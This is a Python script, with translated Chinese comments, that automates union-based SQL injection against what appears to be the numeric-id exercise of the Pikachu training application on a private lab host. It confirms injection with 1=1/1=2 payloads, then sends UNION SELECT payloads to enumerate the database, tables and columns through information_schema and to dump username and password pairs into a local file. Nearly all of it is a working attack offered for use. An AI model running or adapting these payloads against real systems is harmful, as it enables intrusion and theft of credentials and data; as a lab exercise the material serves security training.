# Interactive walkthrough of a union-based SQL injection against a lab target.
# The request path ("pikachu-master/vul/sqli/sqli_id.php") appears to be the
# numeric-id SQLi exercise of the Pikachu training application — confirm before use.
# Each stage POSTs a crafted "id" value, extracts the echoed value with a regex,
# and appends the result to post_sql.txt.
#
# Author's notes (translated):
# target_table = int(input("Enter the index of the table to enumerate: table_list[x]:"))  # watch the type (int index)
# Watch the page echo: there are two segments, and note how many values come back.
# r'your email is:(.*?)</p>', col_resp.text, re.S)  -- do not add extra spaces inside the regex.
# from {table_list[target_table]}  and  where table_name = '{table_list[target_table]}'
import requests  # third-party dependency (not stdlib)
import re
# Lab endpoint on a private (RFC 1918) address; change for a different lab host.
target_url = "http://192.168.8.1/pikachu-master/vul/sqli/sqli_id.php"
if __name__ == "__main__":
    # Every finding is appended to this file for the whole run.
    with open("post_sql.txt", "w", encoding="utf-8") as f:
        # Stage 1: boolean check. Two payloads whose conditions differ
        # (1=1 vs 1=2); a differing response length is taken as the signal.
        true_payload = {"id": "1 or 1=1 #", "submit": "查询"}
        false_payload = {"id": "1 or 1=2 #", "submit": "查询"}
        resp_true = requests.post(url=target_url, data=true_payload)
        resp_false = requests.post(url=target_url, data=false_payload)
        # Length comparison only — dynamic page content could make this
        # signal noisy either way (false positive or false negative).
        if len(resp_true.text) != len(resp_false.text):
            print("[+] 注入成功,存在数字型注入!")  # "injection confirmed, numeric type"
            print("[+] 接下来开始爆库,爆表,爆字段")  # "next: database, tables, columns"
        else:
            print("[-] 注入失败开始重新构造Payload")  # "no injection detected"
            print(resp_false.text[:500])  # first 500 chars of the page, for inspection
            exit()  # site.exit builtin; terminates the script here
        print("=" * 50)
        print("[+] 开始爆库")  # "enumerate database name"
        # Stage 2: UNION SELECT with database(); the echoed value is read
        # from the "your email is:" paragraph.
        db_payload = {"id": "1 union select 1,database() #", "submit": "查询"}
        db_resp = requests.post(url=target_url, data=db_payload)
        # NOTE(review): this pattern has a space after the colon, unlike the
        # later ones — consistent with the author's own warning above.
        db_match = re.findall(r"your email is: (.*?)</p>", db_resp.text, re.S)
        if db_match:
            # The last match is used: the first echo slot belongs to the original row.
            db_name = db_match[-1].strip()
            print(f"[+] 成功获取到库名:{db_name}")  # "database name obtained"
            f.write(f"[+] 库名{db_name}\n")
        else:
            print("[-] 爆库失败,请重新构造payload!")  # "database enumeration failed"
            print(db_resp.text[:500])
            exit()
        print("="*50)
        print("[+] 开始爆表 ")  # "enumerate tables"
        # Stage 3: table names of the current schema via information_schema,
        # concatenated into one comma-separated string.
        table_payload = {"id":"1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #","submit":"查询"}
        table_resp = requests.post(url=target_url, data=table_payload)
        table_match = re.findall(r"your email is:(.*?)</p>",table_resp.text, re.S)
        if table_match:
            print("[+] 成功爆破 ")  # "success"
            table_name = table_match[-1].strip()  # a single comma-separated string
            table_list = table_name.split(",")
            f.write(f"[+] 表名{table_list}\n")
            print(f"[+] table_list = {table_list}")
        else:
            # table_list is only bound in the branch above; the script continues regardless.
            print("[-] 爆表失败,重新构造payload!")  # "table enumeration failed"
            print(table_resp.text[:500])
        print("="*50)
        print("[+] 爆破字段")  # "enumerate columns"
        # Stage 4: the operator picks a table by index; its columns are
        # fetched the same way, filtered by schema and table name.
        target_table = int(input("请输入你要爆破的表名位置:table_list[x]:"))  # watch the type (int index)
        col_payload = {"id":f"1 union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = '{table_list[target_table]}' #","submit":"查询"}
        col_resp = requests.post(url=target_url, data=col_payload)
        col_match = re.findall(r'your email is:(.*?)</p>', col_resp.text, re.S)
        if col_match:
            col_name = col_match[-1].strip()
            print("[+] 注入成功 ")  # "success"
            col_list = col_name.split(",")
            print(f"[+] 段名为{col_list}")  # "column names"
            f.write(f"[+] 保存{col_list}\n")
        else:
            # col_list is only bound in the branch above; the script continues regardless.
            print("[-] 注入失败 ")  # "failed"
            print(col_resp.text[:500])
        print("="*50)
        # Stage 5: two column indices are read from the operator and their
        # values are concatenated pairwise with '|' as the separator.
        num1,num2 = map(int,input("请输入你要查询的两个字段内容col_list[num]用逗号隔开:").split(","))
        pwd_payload = {"id":f"1 union select 1,group_concat({col_list[num1]},'|',{col_list[num2]}) from {table_list[target_table]} #","submit":"查询"}
        pwd_resp = requests.post(url=target_url, data=pwd_payload)
        user_matchs = re.findall(r'hello,(.*?)</p>', pwd_resp.text, re.S)  # captured but not used below
        pwd_matchs = re.findall(r'your email is:(.*?)</p>', pwd_resp.text, re.S)
        if pwd_matchs:
            print("[+] 注入成功 ")  # "success"
            print(f"[+] 账号和密码为:\n")  # f-string without placeholders
            result = pwd_matchs[-1].strip()
            # group_concat separates rows with ',', and the two columns with '|'.
            user_pwd_list = result.split(",")
            for up in user_pwd_list:
                if '|' in up:
                    user,pwd = up.split('|',1)  # split on the first '|' only
                    print(f"[+] 用户名:{user} 密码:{pwd}")
                    f.write(f"用户名:{user} | 密码:{pwd}\n")
        else:
            # Fallback: dump the raw lines that carry the echo slots.
            print("[-] 注入失败,请重新构造payload")  # "failed"
            for line in pwd_resp.text.splitlines():
                if "hello" in line or "your email" in line:
                    print(line.strip())
                    f.write(line.strip() + "\n")
        print("[+] 结果已保存在 post_sql.txt")  # "results saved to post_sql.txt"